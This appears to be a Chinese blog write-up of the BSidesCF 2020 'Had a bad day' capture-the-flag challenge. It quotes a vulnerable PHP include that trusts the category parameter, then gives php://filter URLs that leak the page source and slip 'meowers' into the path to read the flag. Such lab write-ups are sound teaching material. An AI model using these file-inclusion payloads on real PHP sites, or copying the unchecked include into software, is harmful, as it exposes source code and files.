[BSidesCF 2020]Had a bad day

最新推荐文章于 2024-04-26 23:16:19 发布

4pri1

最新推荐文章于 2024-04-26 23:16:19 发布

阅读量561

点赞数 1

分类专栏： ctfWP 自己的笔记文章标签： php ctf 伪协议 web filter

本文链接：https://blog.csdn.net/qq_20533167/article/details/117226027

版权

ctfWP 同时被 2 个专栏收录

36 篇文章 0 订阅

订阅专栏

自己的笔记

6 篇文章 0 订阅

订阅专栏

[BSidesCF 2020]Had a bad day

https://github.com/BSidesSF/ctf-2020-release/

点击两个按钮，url栏的category= 会发生变化

这里是伪协议的知识点：

——摘自：https://blog.csdn.net/weixin_44508748/article/details/108162951.

本题用到的就是filter这个伪协议

所以构造url： http://97621188-63ea-4882-8d39-da8109116ec8.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/resource=index.php

但是并没有正常得到，看一下报错信息

去掉一个php

http://97621188-63ea-4882-8d39-da8109116ec8.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/resource=index

然后得到

解码

找到关键部分

  <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

那就是只要构造的url中伪协议的参数部分包含woofers meowers index任意一个即可

http://97621188-63ea-4882-8d39-da8109116ec8.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/meowers/resource=flag

4pri1

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[BSidesCF 2020]Had a bad day

[BSidesCF 2020]Had a bad dayhttps://github.com/BSidesSF/ctf-2020-release/点击两个按钮，url栏的category= 会发生变化这里是伪协议的知识点：——摘自：https://blog.csdn.net/weixin_44508748/article/details/108162951.本题用到的就是filter这个伪协议所以构造url：http://97621188-63ea-4882-...
复制链接

扫一扫